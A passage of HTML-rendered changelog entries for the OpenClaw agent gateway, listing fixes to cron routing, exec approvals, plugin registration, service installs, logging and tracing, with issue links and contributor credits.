href="https://github.com/openclaw/openclaw/issues/67172">#67172</a>; follow-up to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132019195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54188" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54188/hovercard" href="https://github.com/openclaw/openclaw/issues/54188">#54188</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061845058" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43631" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43631/hovercard" href="https://github.com/openclaw/openclaw/pull/43631">#43631</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287182726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68453/hovercard" href="https://github.com/openclaw/openclaw/pull/68453">#68453</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331130608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72219/hovercard" href="https://github.com/openclaw/openclaw/pull/72219">#72219</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269089318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67186" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67186/hovercard" href="https://github.com/openclaw/openclaw/pull/67186">#67186</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zNatix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zNatix">@zNatix</a>, @pixeldyn, @ChickenEggRoll, @SPFAdvisors, @anyech, @slideshow-dingo, @hatemclawbot-collab, @xydigit-sj, @oc-gh-dr, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
<li>Cron/routing: preserve direct Telegram thread/account IDs, explicit Discord <code>user:</code>/<code>channel:</code> delivery targets, and <code>session:&lt;id&gt;</code> failure-destination routing so reminders, cron announcements, and failure alerts keep the intended recipient kind across direct and group chats. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066185841" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44270" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44270/hovercard" href="https://github.com/openclaw/openclaw/issues/44270">#44270</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221312754" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62777/hovercard" href="https://github.com/openclaw/openclaw/issues/62777">#62777</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066608008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44325" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44325/hovercard" href="https://github.com/openclaw/openclaw/pull/44325">#44325</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066877751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44351" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44351/hovercard" href="https://github.com/openclaw/openclaw/pull/44351">#44351</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067595953" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44412" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44412/hovercard" href="https://github.com/openclaw/openclaw/pull/44412">#44412</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333658933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72657" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72657/hovercard" href="https://github.com/openclaw/openclaw/pull/72657">#72657</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287884114" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68535" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68535/hovercard" href="https://github.com/openclaw/openclaw/pull/68535">#68535</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221461201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62798" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62798/hovercard" href="https://github.com/openclaw/openclaw/pull/62798">#62798</a>. Thanks @RunMintOn, @arkyu2077, @0xsline, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, @slideshow-dingo, @likewen-tech, and @neeravmakwana.</li>
<li>Subagents: keep the delegated task only in the subagent system prompt and send a short initial kickoff message, avoiding duplicate task tokens while preserving multiline task formatting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330266987" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72019" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72019/hovercard" href="https://github.com/openclaw/openclaw/issues/72019">#72019</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330403858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72053" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72053/hovercard" href="https://github.com/openclaw/openclaw/pull/72053">#72053</a>. Thanks @Wizongod and @ly85206559.</li>
<li>Onboarding/GitHub Copilot: add manifest-owned <code>--github-copilot-token</code> support for non-interactive setup, including env fallback, tokenRef storage in ref mode, saved-profile reuse, and current Copilot default-model wiring. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097444746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50002" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50002/hovercard" href="https://github.com/openclaw/openclaw/issues/50002">#50002</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097445479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50003/hovercard" href="https://github.com/openclaw/openclaw/pull/50003">#50003</a>. Thanks @scottgl9.</li>
<li>Gateway/install: add a validated <code>--wrapper</code>/<code>OPENCLAW_WRAPPER</code> service install path that persists executable LaunchAgent/systemd wrappers across forced reinstalls, updates, and doctor repairs instead of falling back to raw node/bun <code>ProgramArguments</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297397474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69400/hovercard" href="https://github.com/openclaw/openclaw/issues/69400">#69400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332409419" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72445" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72445/hovercard" href="https://github.com/openclaw/openclaw/pull/72445">#72445</a>) Thanks @willtmc.</li>
<li>Plugins: fail plugin registration when loader-owned acceptance gates reject missing hook names or memory-only capability registration from non-memory plugins, surfacing the issue through plugin status and doctor instead of silently dropping the registration. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332435276" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72459" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72459/hovercard" href="https://github.com/openclaw/openclaw/issues/72459">#72459</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>macOS Gateway: write launchd services with a state-dir <code>WorkingDirectory</code>, use a durable state-dir temp path instead of freezing macOS session <code>TMPDIR</code>, create that temp directory before bootstrap, and label abort-shaped launchd exits as <code>SIGABRT/abort</code> in status output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4127640305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53679" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53679/hovercard" href="https://github.com/openclaw/openclaw/issues/53679">#53679</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309815603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70223" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70223/hovercard" href="https://github.com/openclaw/openclaw/issues/70223">#70223</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329643796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71848/hovercard" href="https://github.com/openclaw/openclaw/issues/71848">#71848</a>. Thanks @dlturock, @stammi922, and @palladius.</li>
<li>Control UI/update: make <code>Update now</code> require a real gateway process replacement, report skipped/error update outcomes with stable reasons, and verify the running gateway version after restart so global installs cannot silently keep old code in memory. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217678354" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62492" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62492/hovercard" href="https://github.com/openclaw/openclaw/issues/62492">#62492</a>; addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245063393" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64892" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64892/hovercard" href="https://github.com/openclaw/openclaw/issues/64892">#64892</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229612858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63562" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63562/hovercard" href="https://github.com/openclaw/openclaw/issues/63562">#63562</a>. Thanks @IAMSamuelRodda.</li>
<li>Exec approvals: accept runtime-owned <code>source: "allow-always"</code> and <code>commandText</code> allowlist metadata in gateway and node approval-set payloads so Control UI round-trips no longer fail with <code>unexpected property 'source'</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197832508" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60000/hovercard" href="https://github.com/openclaw/openclaw/issues/60000">#60000</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198205333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60064" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60064/hovercard" href="https://github.com/openclaw/openclaw/pull/60064">#60064</a>. Thanks @sd1471123, @sharkqwy, and @luoyanglang.</li>
<li>Exec/node: skip approval-plan preparation for full-trust <code>host=node</code> runs so interpreter and script commands no longer fail with <code>SYSTEM_RUN_DENIED: approval cannot safely bind</code> when effective policy is <code>security=full</code> and <code>ask=off</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084375630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48457/hovercard" href="https://github.com/openclaw/openclaw/issues/48457">#48457</a> and duplicate <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293866252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69251" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69251/hovercard" href="https://github.com/openclaw/openclaw/issues/69251">#69251</a>. Thanks @ajtran303, @jaserNo1, @Blakeshannon, @lesliefag, and @AvIsBeastMC.</li>
<li>Exec/node: synthesize a local approval plan when a paired node advertises <code>system.run</code> without <code>system.run.prepare</code>, unblocking approval-required <code>host=node</code> exec on current macOS companion nodes while preserving remote prepare for node hosts that support it. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033313008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37591" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37591/hovercard" href="https://github.com/openclaw/openclaw/issues/37591">#37591</a> and duplicate <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265048569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66839/hovercard" href="https://github.com/openclaw/openclaw/issues/66839">#66839</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303037278" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69725" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69725/hovercard" href="https://github.com/openclaw/openclaw/pull/69725">#69725</a>. Thanks @soloclz.</li>
<li>Memory/QMD: prefer QMD's <code>--mask</code> collection pattern flag so root memory indexing stays scoped to <code>MEMORY.md</code> instead of widening to every markdown file in the workspace. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249056416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65480/hovercard" href="https://github.com/openclaw/openclaw/issues/65480">#65480</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249056746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65481" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65481/hovercard" href="https://github.com/openclaw/openclaw/pull/65481">#65481</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258914603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66259" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66259/hovercard" href="https://github.com/openclaw/openclaw/pull/66259">#66259</a>. Thanks @ccage-simp, @Bortlesboat, @seank-com, and @crazyscience.</li>
<li>Memory/doctor: treat the specific <code>gateway timeout after ...</code> gateway memory probe result as inconclusive instead of reporting embeddings not ready, while preserving warnings for explicit failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067725204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44426/hovercard" href="https://github.com/openclaw/openclaw/issues/44426">#44426</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076741219" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46576" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46576/hovercard" href="https://github.com/openclaw/openclaw/pull/46576">#46576</a> with the Greptile review feedback applied. Thanks Cengiz (@ghost).</li>
<li>Gateway/startup: defer QMD, core request handlers, setup wizard, CLI outbound senders, plugin HTTP routes, chat/session projection, node session runtime validation, embedded-run activity reads, MCP loopback server imports, channel runtime helpers, HTTP/canvas/plugin auth helpers, isolated cron imports, and hook dispatch parsing until their request or shutdown paths, while making plain <code>gateway status</code> use a parse-only config snapshot so no-plugin boots and status reads avoid broad runtime fanout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Lobster/Gateway: memoize repeated Ajv schema compilation before loading the embedded Lobster runtime so scheduled workflows and <code>llm.invoke</code> loops stop growing gateway heap on content-identical schemas. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323825705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71148" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71148/hovercard" href="https://github.com/openclaw/openclaw/issues/71148">#71148</a>. Thanks @cmi525, @vsolaz, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: normalize cached input tokens before session/context accounting so prompt cache reads are not double-counted in <code>/status</code>, <code>session_status</code>, or persisted <code>sessionEntry.totalTokens</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294939319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69298/hovercard" href="https://github.com/openclaw/openclaw/issues/69298">#69298</a>. Thanks @richardmqq.</li>
<li>Hooks/session-memory: use the host local timezone for memory filenames, fallback timestamp slugs, and markdown headers instead of UTC dates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077284827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46703/hovercard" href="https://github.com/openclaw/openclaw/issues/46703">#46703</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077318445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46721/hovercard" href="https://github.com/openclaw/openclaw/pull/46721">#46721</a>) Thanks @Astro-Han.</li>
<li>Gateway health: preserve live runtime-backed channel/account state in <code>gateway.health</code> snapshots and cached refreshes while keeping raw probe payloads on sensitive/admin paths only. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041371133" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39921" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39921/hovercard" href="https://github.com/openclaw/openclaw/pull/39921">#39921</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054923925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42586" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42586/hovercard" href="https://github.com/openclaw/openclaw/pull/42586">#42586</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076534390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46527" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46527/hovercard" href="https://github.com/openclaw/openclaw/pull/46527">#46527</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4119683274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52770" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/52770/hovercard" href="https://github.com/openclaw/openclaw/pull/52770">#52770</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054579227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42543" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42543/hovercard" href="https://github.com/openclaw/openclaw/pull/42543">#42543</a>) Thanks @FAL1989, @rstar327, @0xble, and @ajayr.</li>
<li>Feishu: extract quoted/replied interactive-card text across schema 1.0, schema 2.0, i18n, template-variable, and post-format fallback shapes without carrying broad generated/config churn from related parser experiments. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038206905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38776" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/38776/hovercard" href="https://github.com/openclaw/openclaw/pull/38776">#38776</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4201051829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60383" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60383/hovercard" href="https://github.com/openclaw/openclaw/pull/60383">#60383</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052134122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42218/hovercard" href="https://github.com/openclaw/openclaw/pull/42218">#42218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075296473" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45936/hovercard" href="https://github.com/openclaw/openclaw/pull/45936">#45936</a>) Thanks @lishuaigit, @lskun, @just2gooo, and @Br1an67.</li>
<li>Telegram/agents: hide raw failed write/edit warning messages in Telegram when the assistant already explicitly acknowledges the failed action, while keeping warnings when the reply claims success or omits the failure; <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040278873" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39406" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39406/hovercard" href="https://github.com/openclaw/openclaw/issues/39406">#39406</a> remains the broader configurable delivery-policy follow-up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107998150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51065" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51065/hovercard" href="https://github.com/openclaw/openclaw/issues/51065">#51065</a>; covers <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040841536" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39631/hovercard" href="https://github.com/openclaw/openclaw/issues/39631">#39631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a> and @Bortlesboat.</li>
<li>Exec approvals: accept a symlinked <code>OPENCLAW_HOME</code> as the trusted approvals root while still rejecting symlinked <code>.openclaw</code> path components below it. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243267118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64663" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64663/hovercard" href="https://github.com/openclaw/openclaw/pull/64663">#64663</a>) Thanks @FunJim.</li>
<li>Logging: add top-level <code>hostname</code>, flattened <code>message</code>, and available <code>agent_id</code>, <code>session_id</code>, and <code>channel</code> fields to file-log JSONL records for multi-agent filtering without removing existing structured log arguments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108127045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51075/hovercard" href="https://github.com/openclaw/openclaw/issues/51075">#51075</a>. Thanks @stevengonsalvez.</li>
<li>ACP: route server logs to stderr before Gateway config/bootstrap work so ACP stdout remains JSON-RPC only for IDE integrations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088925593" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49060/hovercard" href="https://github.com/openclaw/openclaw/issues/49060">#49060</a>. Thanks @Hollychou924.</li>
<li>Logging: propagate internal request trace scopes through Gateway HTTP requests and WebSocket frames so file logs, diagnostic events, agent run traces, model-call traces, OTEL spans, and trusted provider <code>traceparent</code> headers share a correlatable <code>traceId</code> without logging raw request or model content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042435480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40353" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40353/hovercard" href="https://github.com/openclaw/openclaw/issues/40353">#40353</a>. Thanks @liangruochong44-ui.</li>
<li>Diagnostics/OTEL: capture privacy-safe model-call request payload bytes, streamed response bytes, first-response latency, and total duration in diagnostic events, plugin hooks, stability snapshots, and OTEL model-call spans/metrics without logging raw model content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4019760959" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33832/hovercard" href="https://github.com/openclaw/openclaw/issues/33832">#33832</a>. Thanks @wwh830.</li>
<li>Logging: write validated diagnostic trace context as top-level <code>traceId</code>, <code>spanId</code>, <code>parentSpanId</code>, and <code>traceFlags</code> fields in file-log JSONL records so traced requests and model calls are easier to correlate in log processors. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042435480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40353" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40353/hovercard" href="https://github.com/openclaw/openclaw/issues/40353">#40353</a>. Thanks @liangruochong44-ui.</li>
<li>Logging/sessions: apply configured redaction patterns to persisted session transcript text and accept escaped character classes in safe custom redaction regexes, so transcript JSONL no longer keeps matching sensitive text in the clear. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056740716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42982/hovercard" href="https://github.com/openclaw/openclaw/issues/42982">#42982</a>. Thanks @panpan0000.</li>
<li>Agents/sessions: let <code>sessions_spawn runtime="subagent"</code> ignore ACP-only <code>streamTo</code> and <code>resumeSessionId</code> fields while keeping ACP passthrough and documenting <code>streamTo</code> as ACP-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061499254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43556/hovercard" href="https://github.com/openclaw/openclaw/issues/43556">#43556</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4224020997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63120/hovercard" href="https://github.com/openclaw/openclaw/issues/63120">#63120</a>; covers <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159060112" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56326" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56326/hovercard" href="https://github.com/openclaw/openclaw/issues/56326">#56326</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210049383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61724" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61724/hovercard" href="https://github.com/openclaw/openclaw/issues/61724">#61724</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243766641" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64714" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64714/hovercard" href="https://github.com/openclaw/openclaw/issues/64714">#64714</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269747849" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67248" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67248/hovercard" href="https://github.com/openclaw/openclaw/issues/67248">#67248</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286646321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68397" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68397/hovercard" href="https://github.com/openclaw/openclaw/pull/68397">#68397</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247437331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65282" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65282/hovercard" href="https://github.com/openclaw/openclaw/pull/65282">#65282</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183666554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58686" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58686/hovercard" href="https://github.com/openclaw/openclaw/pull/58686">#58686</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159218513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56342" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56342/hovercard" href="https://github.com/openclaw/openclaw/pull/56342">#56342</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041738951" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40102" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40102/hovercard" href="https://github.com/openclaw/openclaw/pull/40102">#40102</a>. Thanks @skernelx, @damselem, @Br1an67, @Mintalix, @IsaacAPerez, @vvitovec, <a class="user-mention notranslate" data-hovercard-type="user" 